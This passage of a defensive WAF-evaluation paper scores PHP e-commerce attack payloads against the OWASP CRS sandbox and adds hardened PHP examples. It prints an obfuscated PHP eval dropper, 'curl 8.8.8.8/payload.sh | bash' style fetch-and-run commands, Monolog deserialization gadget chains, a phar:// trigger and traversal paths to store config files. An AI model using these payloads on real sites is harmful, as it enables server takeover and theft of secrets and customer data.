curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%3C%3F%3D74%3Beval%2F%2Acnmq%2A%2F%28%27%3F%3E%3C%3Fphp%20%27.eval%2F%2Acnmq%2A%2F%28%27return%20base64%27.%27_decode%28eval%2F%2Acnmq%2A%2F%28base64%27.%27_%27.%27dec%27.%27ode%27.%27%28%22cmV0dXJuIEBvcGVuc3NsX2RlY3J5cHQoQGd6dW5jb21wcmVzcyhAYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsnX3BrX3JlZmNubXEnXSkpLCAnYWVzLTI1Ni1jYmMnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10sIE9QRU5TU0xfUkFXX0RBVEEsIHN1YnN0cihoYXNoKCdzaGEyNTYnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10pLCAwLCAxNikp%22%29%29%29%3B%27%29%29%3B"
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.

Now let's look at the result on the OWASP CRS side, with a WAF configured at Paranoia Level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "oiyc=%3C%3F%3D86%3Beval%2F%2Aoiyc%2A%2F%28%27%3F%3E%3C%3Fphp%20%27.eval%2F%2Aoiyc%2A%2F%28%27return%20base64%27.%27_decode%28eval%2F%2Aoiyc%2A%2F%28base64%27.%27_%27.%27dec%27.%27ode%27.%27%28%22cmV0dXJuIEBvcGVuc3NsX2RlY3J5cHQoQGd6dW5jb21wcmVzcyhAYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsnX3BrX3JlZm9peWMnXSkpLCAnYWVzLTI1Ni1jYmMnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10sIE9QRU5TU0xfUkFXX0RBVEEsIHN1YnN0cihoYXNoKCdzaGEyNTYnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10pLCAwLCAxNikp%22%29%29%29%3B%27%29%29%3B"
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 43)


Provided that your WAF is configured at Paranoia Level 2, we observe a score four times higher: 43. Nevertheless, the point is the same as with SQL injection: rule 932200 will only rarely be triggered.

Therefore, rule 932200 must be removed from this score. As a result, the score actually observed on the vast majority of WAFs will be 43 minus the 10 points associated with rule 932200, i.e. an effective score of 33, not 43.

In other words, this payload will get through any WAF configured at PL2 (paranoia level 2) that does not block scores greater than or equal to 30.

The conclusion from these few demonstrations within the scope of PHP injection (CWE-94) is: if your WAF provider
  • operates at PL1 (paranoia level 1) and does not block anything above a 10-point score
  • operates at PL2 (paranoia level 2) and does not block anything above a 30-point score

You have no preventive protection against PHP injection.



2.4/ Remote code execution: RCE



The Magento and NodeJS/React incidents in the second half of 2025 sadly reminded us that this group of vulnerability classes is just as thorny as XSS injections, and that chained attacks - combining multiple vulnerability classes - are now the norm.

To make the paper easier to digest, PHP injections have been treated separately (see section 2.3). Here, we will cover the other common forms of RCE, which span several distinct vulnerability classes.

The three “usual” targets or attack chains - excluding PHP injection, which has already been detailed - that can lead to RCE in the PHP ecosystem (PrestaShop / Magento / WooCommerce) are as follows:
  • <?php exec($_GET['test']); or equivalent: passthru / system, etc. - CWE-78
  • <?php unserialize($_GET['test']); - CWE-502
  • <?php is_file($_GET['test']); just like any function that accesses the filesystem with an unprefixed variable - CWE-502, PHAR variant for PHP 7 and earlier

The goal is the same as the one described for PHP injections: to take control of the server, which implies deploying backdoors.



2.4.1/ OS command injection - CWE-78



You've almost certainly already come across this probe payload, used to list users on a GNU/Linux system:

?cnmq=& cat /etc/passwd

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20cat%20%2Fetc%2Fpasswd"
930120 PL1 OS File Access Attempt
932160 PL1 Remote Command Execution: Unix Shell Code Found
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.

In an offensive variant, the goal is often to load code remotely. Typical payloads therefore consist in fetching a file hosted on a remote server, then executing it using software available on the target server.

In this example, curl is used to download a file, which is then executed via bash. If your system is vulnerable to RCE and this payload gets through, the attacker immediately gains full control over your e-commerce site.

To minimize the anomaly score, we use a direct call to an IP address here, which helps avoid triggering defense mechanisms related to RFI (Remote File Inclusion).

?cnmq=& curl 8.8.8.8/payload.sh | bash

Let's test our payload at Paranoia Level 1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.sh%20%7C%20bash"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
932370 PL1 Remote Command Execution: Windows Command Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.

Now let's test it at Paranoia Level 2 :

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.sh%20%7C%20bash"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
932370 PL1 Remote Command Execution: Windows Command Injection
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)


Please note the payload score: 15, which corresponds to the triggering of three critical rules. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 15, this payload will get through without difficulty.

bash isn't always available in environments with strict security constraints. On the other hand, the PHP binary is almost always present in our PHP e-commerce contexts. Let's look at this payload:

?cnmq=& curl 8.8.8.8/payload.php | php

Let's test it at Paranoia Level 1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.php%20%7C%20php"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)


Please note the payload score: 5, which corresponds to the triggering of a single critical rule. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 5, this payload will get through without difficulty.

Let's test it at Paranoia Level 2 :

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.php%20%7C%20php"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 10, this payload will get through without difficulty.
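The WAF is the outer layer; the sink listed at the start of section 2.4, exec($_GET['test']), is what actually turns one of these requests into a shell. Here is an added example in PHP 8 (not PrestaShop's code, not from this article) that puts that sink beside a launcher which removes the shell altogether: proc_open() with an argv array starts the program directly, so "&", "|" and the other metacharacters seen in the payloads above are plain bytes inside one argument, and the program itself comes from a fixed allowlist rather than from the request. The tool path /usr/bin/printf is an assumption standing in for a real image or archive tool.

```php
<?php
declare(strict_types=1);

// Added example, not PrestaShop code: the exec($_GET['test']) sink from the
// start of section 2.4 beside a launcher that removes the shell altogether.
// proc_open() with an argv array (PHP 7.4+) starts the program directly, so
// "&", "|" and friends are plain bytes inside one argument. The program comes
// from a fixed allowlist, never from the request. Tool paths are assumptions.

final class CommandRefused extends RuntimeException {}

// Vulnerable form: the request string is handed verbatim to /bin/sh, so a
// second command separated by "&" or "|" runs with the web server's rights.
function vulnerableExec(string $userInput): void
{
    exec($userInput);
}

// Hardened form. Keys are the only names a request may mention; values are
// the binaries actually started. /usr/bin/printf stands in for a real
// image or archive tool here (assumed path).
const ALLOWED_TOOLS = [
    'printf' => '/usr/bin/printf',
];

/** Run an allowlisted program with literal arguments and return its stdout. */
function runTool(string $tool, array $args): string
{
    if (!isset(ALLOWED_TOOLS[$tool])) {
        throw new CommandRefused("tool not allowed: $tool");
    }
    foreach ($args as $arg) {
        if (!is_string($arg) || str_contains($arg, "\0")) {
            throw new CommandRefused('arguments must be NUL-free strings');
        }
        // A leading dash would let a value be parsed as an option (argument
        // injection), so values must start with a letter, digit, '/', '%' or '.'.
        if (preg_match('#^[A-Za-z0-9/%.]#', $arg) !== 1) {
            throw new CommandRefused("argument rejected: $arg");
        }
    }

    $argv  = array_merge([ALLOWED_TOOLS[$tool]], $args);
    $pipes = [];
    $proc  = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start process');
    }
    $stdout = stream_get_contents($pipes[1]);
    stream_get_contents($pipes[2]); // drain stderr so the child never blocks
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $stdout;
}

function demo(): array
{
    // Constructed input: looks like a chained command, but with no shell in
    // the way it is just one argument and comes back unchanged.
    $input = 'catalogue & prices | 2026';
    $out   = ['literal argument' => runTool('printf', ['%s', $input])];
    try {
        runTool('sh', ['-c', 'true']);
    } catch (CommandRefused $e) {
        $out['unlisted tool'] = 'refused: ' . $e->getMessage();
    }
    return $out;
}

print_r(demo());
```

The point of the allowlist is that no quoting strategy has to be right: even if an argument check were too loose, the request can only ever choose among the programs the application already intended to run, and cannot name bash, php or curl.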



2.4.2/ Dangerous deserializations - Deserialization of Untrusted Data - CWE-502



Now let's look at dangerous deserialization, exploiting PHP's unserialize function.

For this example, we'll rely on a fragment of the payload used by Session Reaper, which wreaked havoc on the Magento ecosystem. This exploitation chain also exists in PrestaShop, since Monolog has been an essential dependency since PrestaShop 1.7, namely:

?cnmq=Monolog\Handler\BufferHandler":7:{S:7:"handler";r:2;S:10:"bufferSize";i:-1;S:6:"buffer";a:1:{i:0;a:2:{i:0;S:71:"curl 8.8.8.8/payload.php | php";S:5:"level";N;}}S:5:"level";N;S:11:"initialized";b:1;S:11:"bufferLimit";i:-1;S:10:"processors";a:2:{i:0;S:7:"current";i:1;S:4:"exec";}}}

Let's test it at Paranoia Level 1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7BS%3A7%3A%22handler%22%3Br%3A2%3BS%3A10%3A%22bufferSize%22%3Bi%3A-1%3BS%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BS%3A71%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3BS%3A5%3A%22level%22%3BN%3B%7D%7DS%3A5%3A%22level%22%3BN%3BS%3A11%3A%22initialized%22%3Bb%3A1%3BS%3A11%3A%22bufferLimit%22%3Bi%3A-1%3BS%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3BS%3A7%3A%22current%22%3Bi%3A1%3BS%3A4%3A%22exec%22%3B%7D%7D%7D"
There is no result, which means the sequence is not blocked at all.

Let's test it at Paranoia Level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7BS%3A7%3A%22handler%22%3Br%3A2%3BS%3A10%3A%22bufferSize%22%3Bi%3A-1%3BS%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BS%3A71%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3BS%3A5%3A%22level%22%3BN%3B%7D%7DS%3A5%3A%22level%22%3BN%3BS%3A11%3A%22initialized%22%3Bb%3A1%3BS%3A11%3A%22bufferLimit%22%3Bi%3A-1%3BS%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3BS%3A7%3A%22current%22%3Bi%3A1%3BS%3A4%3A%22exec%22%3B%7D%7D%7D"
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
942180 PL? Detects basic SQL authentication bypass attempts 1/3
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 23)


Please note the payload score, which comes to 23 points, corresponding to the triggering of four critical rules. However, be careful: rule 932200 was triggered. As mentioned earlier, we therefore need to subtract its score, which gives an adjusted score of 23 − 10 = 13 points.

If your WAF does not block payloads with a score above 10, this payload will get through without difficulty.

The more observant among you will have noticed that it isn't entirely fair to insist on the CWE-502 angle with this payload. It is in fact specific to an internal Magento mechanism, exploiting the upload of a file without an extension, which greatly limits its applicability in other contexts.

Let's now take a payload that is compatible with the entire PHP ecosystem - you can generate as many as you want using the PHPGGC project (https://github.com/ambionics/phpggc), as Monolog isn't the only library affected:

O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:13:"passthruLevel";i:0;s:6:"buffer";a:1:{s:4:"test";a:2:{i:0;s:45:"curl 8.8.8.8/payload.php | php";s:5:"level";N;}}s:7:"handler";O:29:"Monolog\Handler\BufferHandler":7:{s:7:"handler";N;s:10:"bufferSize";i:-1;s:6:"buffer";N;s:5:"level";N;s:11:"initialized";b:1;s:11:"bufferLimit";i:-1;s:10:"processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}

Let's test it at Paranoia Level 1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=O%3A37%3A%22Monolog%5CHandler%5CFingersCrossedHandler%22%3A3%3A%7Bs%3A13%3A%22passthruLevel%22%3Bi%3A0%3Bs%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A45%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A7%3A%22handler%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A7%3A%22handler%22%3BN%3Bs%3A10%3A%22bufferSize%22%3Bi%3A-1%3Bs%3A6%3A%22buffer%22%3BN%3Bs%3A5%3A%22level%22%3BN%3Bs%3A11%3A%22initialized%22%3Bb%3A1%3Bs%3A11%3A%22bufferLimit%22%3Bi%3A-1%3Bs%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D"
933170 PL1 PHP Injection Attack: Serialized Object Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)


Please note the payload score: 5, which corresponds to the triggering of a single critical rule. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 5, this payload will get through without difficulty.

Let's test it at Paranoia Level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=O%3A37%3A%22Monolog%5CHandler%5CFingersCrossedHandler%22%3A3%3A%7Bs%3A13%3A%22passthruLevel%22%3Bi%3A0%3Bs%3A6%3A%22buffer%22%3Ba%3A1%3A%7Bs%3A4%3A%22test%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A45%3A%22curl%208.8.8.8%2Fpayload.php%20%7C%20php%22%3Bs%3A5%3A%22level%22%3BN%3B%7D%7Ds%3A7%3A%22handler%22%3BO%3A29%3A%22Monolog%5CHandler%5CBufferHandler%22%3A7%3A%7Bs%3A7%3A%22handler%22%3BN%3Bs%3A10%3A%22bufferSize%22%3Bi%3A-1%3Bs%3A6%3A%22buffer%22%3BN%3Bs%3A5%3A%22level%22%3BN%3Bs%3A11%3A%22initialized%22%3Bb%3A1%3Bs%3A11%3A%22bufferLimit%22%3Bi%3A-1%3Bs%3A10%3A%22processors%22%3Ba%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22current%22%3Bi%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D"
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
933170 PL1 PHP Injection Attack: Serialized Object Injection
942180 PL? Detects basic SQL authentication bypass attempts 1/3
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 28)


Please note the payload score: 28, corresponding to the triggering of five critical rules. However, be careful: rule 932200 was triggered twice, so we need to subtract that score. The adjusted score is therefore 28 minus the 10 points associated with rule 932200, so 18 points.

If your WAF does not block payloads with a score above 15, this payload will get through without difficulty.

Whenever you encounter a call to unserialize() in PHP code, you can assume that if it isn't used with the ['allowed_classes' => false] option, it is very often a critical vulnerability. This type of weakness directly exposes the application to PHP Object Injection scenarios, with potentially major impacts (code execution, privilege escalation, full application compromise). In this context, the severity is at its maximum, with a CVSS 4.0 score of 10/10. Despite years of feedback and documented incidents, this pattern is still very widespread across the PHP ecosystem. Additional hardening mechanisms have been introduced with PHP 8.4, and one can reasonably hope for even stricter changes with PHP 9, given how high the structural risk associated with unserialize() is.
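Here is what the ['allowed_classes' => false] option described above looks like in practice, as an added example in PHP 8 (not PrestaShop's or Monolog's code, and not part of this article). With that option PHP never instantiates the class named in the payload, so no __wakeup()/__destruct() gadget runs; the wrapper then refuses the result outright if any object placeholder remains, so only scalars and arrays ever reach application code. The class name GadgetHolder in the sample is a constructed placeholder and does not need to exist.

```php
<?php
declare(strict_types=1);

// Added example, not PrestaShop or Monolog code: the unserialize() call the
// text warns about, beside a hardened wrapper. Requires PHP 7.4+ for the
// max_depth option and PHP 8.0+ for the mixed type.

final class UntrustedSerializedData extends UnexpectedValueException {}

// Vulnerable form: every class named in the payload is instantiated, so a
// gadget chain such as the Monolog one shown above runs during unserialize().
function vulnerableUnserialize(string $data): mixed
{
    return unserialize($data);
}

/** Hardened form: no class instantiation, bounded nesting, no objects accepted. */
function safeUnserialize(string $data): mixed
{
    $value = @unserialize($data, ['allowed_classes' => false, 'max_depth' => 16]);
    // unserialize() returns false both for the literal "b:0;" and on failure,
    // so tell the two apart explicitly.
    if ($value === false && $data !== 'b:0;') {
        throw new UntrustedSerializedData('malformed serialized data');
    }
    assertNoObjects($value);
    return $value;
}

/** Walk the decoded value and reject any __PHP_Incomplete_Class placeholder. */
function assertNoObjects(mixed $value): void
{
    if (is_object($value)) {
        throw new UntrustedSerializedData('serialized objects are not accepted');
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            assertNoObjects($item);
        }
    }
}

function demo(): array
{
    // Constructed samples: a harmless array, and an object payload naming a
    // placeholder class (it does not need to exist for the check to fire).
    $harmless = serialize(['cart' => [1, 2, 3], 'coupon' => 'SPRING']);
    $object   = 'a:1:{i:0;O:12:"GadgetHolder":1:{s:3:"cmd";s:2:"id";}}';

    $out = ['harmless' => safeUnserialize($harmless)];
    try {
        safeUnserialize($object);
        $out['object'] = 'accepted (should not happen)';
    } catch (UntrustedSerializedData $e) {
        $out['object'] = 'rejected: ' . $e->getMessage();
    }
    return $out;
}

print_r(demo());
```

Where the data is yours to define, the better fix is not to use unserialize() on request data at all and to exchange JSON instead; the wrapper above is for the cases where a serialized format is imposed by an existing integration.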



2.4.3/ Dangerous deserialization via phar.



The PHP core has been protected against this type of bypass since PHP 8.

In practice - and assuming you are using the recommended PHP versions - only the following are affected:
  • Dolibarr version 13 and below
  • Magento version 2.4.3 and below
  • PrestaShop version 1.7 and below
  • WordPress version 5.5 and below

These attacks are always two-phased:

Phase 1 – Payload deposit.

First, the attacker must upload a file to the system, to a path that is exposed by the online store.

This could be, for example, an image that actually contains a PHAR-type offensive payload, disguised behind a perfectly legitimate file extension.

Phase 2 – Triggering the payload.

Second, all it takes is a filesystem-accessing function that accepts an unprefixed variable.

This behavior very often amounts to a Path Traversal or SSRF vulnerability, for example: is_file($_GET['test']);

For those wondering what is meant by an “unprefixed variable,” here is an example of a prefixed variable: is_file(ROOT_DIR . $_GET['test']); This call cannot be hijacked using a scheme such as phar://.
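The prefix defeats the wrapper, but on its own it still lets ../ sequences walk out of the intended directory. Here is an added example in PHP 8 (not PrestaShop's code, not from this article) that puts the unprefixed is_file() beside a lookup which prefixes the variable, canonicalises the result with realpath() and then checks that the target is still inside the allowed directory, so both the phar:// scheme and the traversal sequences are refused. ROOT_DIR from the text is replaced by a $baseDir parameter; the temporary upload directory and the file in it are constructed fixtures.

```php
<?php
declare(strict_types=1);

// Added example, not PrestaShop code: the is_file($_GET['test']) sink beside
// a hardened lookup. $baseDir plays the role of the text's ROOT_DIR constant.

final class ForbiddenPath extends RuntimeException {}

// Vulnerable form: any stream wrapper or traversal sequence is honoured.
function vulnerableIsFile(string $userInput): bool
{
    return is_file($userInput);
}

/**
 * Resolve $userInput strictly below $baseDir and return the canonical path.
 * Throws instead of touching anything outside $baseDir.
 */
function resolveInside(string $baseDir, string $userInput): string
{
    // A relative file name never legitimately carries a scheme or a NUL byte;
    // refuse phar://, php://, data:// and the like before doing anything else.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $userInput) === 1 || str_contains($userInput, "\0")) {
        throw new ForbiddenPath('stream wrappers are not accepted');
    }

    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException("base directory does not exist: $baseDir");
    }

    // The prefix alone already defeats the wrapper (as the text says);
    // realpath() then collapses ../ so the containment check sees the real target.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $userInput);
    if ($candidate === false) {
        throw new ForbiddenPath('no such file');
    }
    if (!str_starts_with($candidate, $base . DIRECTORY_SEPARATOR)) {
        throw new ForbiddenPath('path escapes the allowed directory');
    }
    return $candidate;
}

function hardenedIsFile(string $baseDir, string $userInput): bool
{
    return is_file(resolveInside($baseDir, $userInput));
}

function demo(): array
{
    // Constructed fixture: a temporary upload directory holding one "image".
    $uploads = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));
    mkdir($uploads);
    file_put_contents($uploads . '/cnmq.jpg', 'not really a jpeg');

    $inputs = [
        'cnmq.jpg',                          // legitimate relative name
        'phar://' . $uploads . '/cnmq.jpg',  // wrapper form from the text
        '../../etc/passwd',                  // traversal out of the prefix
    ];
    $results = [];
    foreach ($inputs as $input) {
        try {
            $results[$input] = hardenedIsFile($uploads, $input) ? 'file' : 'not a file';
        } catch (ForbiddenPath $e) {
            $results[$input] = 'rejected: ' . $e->getMessage();
        }
    }
    unlink($uploads . '/cnmq.jpg');
    rmdir($uploads);
    return $results;
}

print_r(demo());
```

Two details matter for the containment check: compare against $base with a trailing separator, so that a sibling directory whose name merely starts with the base name is not accepted, and compare the realpath() output rather than the concatenated string, so that symlinks inside the upload directory cannot point elsewhere.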

At the risk of stating the obvious: WAFs are not anti-malware solutions by nature. They can try to approximate that, but it isn't their primary purpose.

As a result, OWASP CRS does not natively filter the upload of files whose extension is not considered directly dangerous to the system - that is, for example, anything other than a .php.

Without specific tuning, it's therefore unrealistic to expect to intercept these seemingly harmless files without analyzing their contents.

On the other hand, it is entirely possible to prevent their activation during the second phase of the attack. Here is the triggering payload:

?cnmq=phar://my_predictable_path/cnmq.jpg

Let's test it at Paranoia Level 1:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=phar%3A%2F%2Fmy_predictable_path%2Fcnmq.jpg"
933200 PL1 PHP Injection Attack: Wrapper scheme detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)


Please note the payload score: 5, which corresponds to the triggering of a single critical rule. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 5, this payload will get through without difficulty.

Let's test it at Paranoia Level 2:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=phar%3A%2F%2Fmy_predictable_path%2Fcnmq.jpg"
931130 PL2 Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link
933200 PL1 PHP Injection Attack: Wrapper scheme detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)


Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 10, this payload will get through without difficulty.

This CWE-502 variant is particularly frustrating for auditors. It is, in fact, one of the most dangerous historical attack vectors in the PHP ecosystem and, paradoxically, it is almost impossible to publish security advisories about it in the form of CVEs.
Why? Because even though:
- the likelihood that a system allows file uploads to a predictable path is high,
- and the presence of filesystem access functions (is_file(), file_exists(), getimagesize(), etc.) exposed with unprefixed variables is just as common,
so that the likelihood of this chain existing on a PrestaShop site is high, the likelihood that both weaknesses coexist within the same component (module or plugin) is low. This dependency between two distinct conditions mechanically prevents the publication of a CVE, which requires a reproducible and clearly delimited scope.


The conclusion from these demonstrations within the scope of RCE is: if your WAF provider
  • operates at PL1 (paranoia level 1) and does not block anything above a 5-point score - some “rare” payloads even pass through PL1 completely
  • operates at PL2 (paranoia level 2) and does not block anything above a 10-point score

You have no preventive protection against the common RCE vectors in the PHP ecosystem.


If your developer tells you that you've suffered an RCE, shut down your site immediately and contact an incident response/remediation company.

There is no point in deploying a WAF after a compromise of this kind until the remediation phase has been completed. You don't stop a hemorrhage with body armor. Payloads have already been planted in your system - either with immediate triggering (filesystem) or delayed triggering (database, notably via stored XSS).

These payloads are specifically designed to bypass defense protocols, often by adding an encryption layer (for example, RSA), which makes subsequent payloads unreadable to a WAF.



2.5/ Data theft: path traversal - CWE-22



When the goal is to steal all the secrets from an online store in order to abuse advanced features - such as exporting customer files - configuration files are always targeted. Each business ecosystem has its own payloads for this class of vulnerability.

  • PrestaShop 1.6 and below: ?cnmq=../config/settings.inc.php
  • PrestaShop 1.7 and below: ?cnmq=../app/config/parameters.php
  • Magento 2: ?cnmq=../app/etc/env.php
  • Symfony: ?cnmq=../.env.prod.local or more generally: .env(\.[a-z]+)?\.local

Based on OWASP CRS version 4.20.0, let's look at the score of these payloads:

curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=..%2Fapp%2Fconfig%2Fparameters.php'
930110 PL1 Path Traversal Attack (/../) or (/.../)
930110 PL1 Path Traversal Attack (/../) or (/.../)
930120 PL1 OS File Access Attempt
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)


Rule 930120 is only triggered on recent versions of OWASP CRS, and most WAFs won't be updated for years. We therefore assume that the effective payload score will be 10 points, not 15 points.

In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 10, this payload will get through without difficulty.

The conclusion from this demonstration on the scope of data leaks via the path traversal variant is: if your WAF provider
  • operates at PL1 (paranoia level 1) and does not block anything above a 10-point score

You have no preventive protection against data leaks via Path Traversal.
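The same arithmetic has been applied by hand several times now: in section 2.3 the points of rule 932200 are subtracted because it rarely fires on real deployments, and here the points of rule 930120 are subtracted because the rule only exists from CRS 4.20.0. Here is an added example in PHP (not part of the article and not OWASP CRS code) that makes that computation reproducible: it parses a sandbox listing in the txt-matched-rules format and reports the raw total, the effective score for a deployment's paranoia level, CRS version and blocking threshold, and which rules were set aside. The 5-point default per rule and the 3-point value for 942430 are inferred from the totals shown in this article; on a real deployment the points come from its own rule set, so treat those two values as assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not the article's or OWASP CRS's code: turn a CRS sandbox
// "txt-matched-rules" listing into the effective anomaly score a given WAF
// deployment would see, then compare it with that deployment's threshold.
//
// Assumptions, taken from the text:
//  - every matched rule scores 5 points (CRS "critical") unless listed below;
//  - 932200 rarely fires on real deployments, so its points are subtracted;
//  - 930120 exists only from CRS 4.20.0 onwards (older rule sets lack it);
//  - 949110 is the summary rule and carries no points of its own.

// Severity overrides: rule id => points. 942430 is a 3-point warning rule
// (the 43-, 23-, 28- and 33-point totals in the text only add up with it at 3).
const RULE_POINTS = [942430 => 3];

// Rules excluded from the effective score, with the reason given in the text.
const RARELY_FIRING_RULES = [932200 => 'rarely triggered on real deployments'];
const RULES_SINCE_4_20    = [930120 => 'only present from CRS 4.20.0'];

/**
 * Parse listing lines such as "933100 PL1 PHP Injection Attack: ...".
 * Returns a list of [ruleId, paranoiaLevel|null] pairs, ignoring 949110.
 */
function parseMatchedRules(string $output): array
{
    $rules = [];
    foreach (preg_split('/\R/', trim($output)) as $line) {
        if (preg_match('/^(\d{6})\s+PL(\d|\?)\s/', trim($line), $m) !== 1) {
            continue; // not a rule line (e.g. an echoed curl command)
        }
        $id = (int) $m[1];
        if ($id === 949110) {
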